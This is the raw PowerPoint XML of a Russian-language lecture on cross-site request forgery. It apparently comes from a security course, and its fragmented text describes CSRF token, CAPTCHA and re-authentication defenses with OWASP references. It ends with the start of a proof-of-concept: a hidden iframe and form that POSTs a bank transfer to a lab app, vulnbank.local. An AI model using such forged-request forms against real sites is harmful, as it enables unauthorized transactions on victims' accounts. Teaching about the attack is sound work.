              <a:rPr lang="ru-RU" sz="1800" spc="-4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для</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каждой</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е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>сси</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и</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6830" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50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Же</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тельно</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б</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>авлять</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="2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кен</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ск</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ыт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е</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поле</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тела</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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</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запроса, ч</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обы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5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избежать</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его использова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н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ия</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URL</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6195" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50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Токен</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включать</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URL</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но</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это</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ув</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</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и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>чив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ет</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с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к,</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ч</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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="1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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="2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будет</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="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получен злоумышленником,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-10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ке</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>н</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может</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быт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ь</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с</a:t>
            </a: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dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ьзован</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-6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в ат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ке.</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5560" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="440"/>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П</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имер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-6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реализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-8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генератора</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сессионных</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кен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о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800"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6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для</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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под</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зв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нием</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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-45"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G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ard</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466090" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>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3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найти</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на</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-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сай</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е</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effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OWASP</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r>
              <a:rPr lang="ru-RU" sz="1800" spc="-40" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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https</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www</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err="1">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owasp</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org</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index</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err="1">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php</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PHP</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_</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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"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Guar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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pPr marL="73660" marR="36195" algn="just">
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Можно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-11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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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же</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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требова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ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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от</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-8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пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-7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подтверждения</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запроса</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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(н</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пример</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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помощи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-100"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л</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дополнитель</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н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-135" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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в</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т</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</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р</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>и</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з</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>а</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ц</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ии</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-12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при</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-7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проведении</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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финансовых</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-115"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транзакций</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-11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или см</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ны</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-30" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>парол</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>я</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>).</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a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>На сайте </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>есть более развёрнутый перечень технологий защиты от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="496807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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>display:none</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>csrf-frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>csrf_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="http://vulnbank.local/vulnbank/online/api.php?none" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="POST" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>csrf-frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>transaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>sender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="DE12345123451234512345"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>recipient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="DE00000111112222233333"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>=""&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
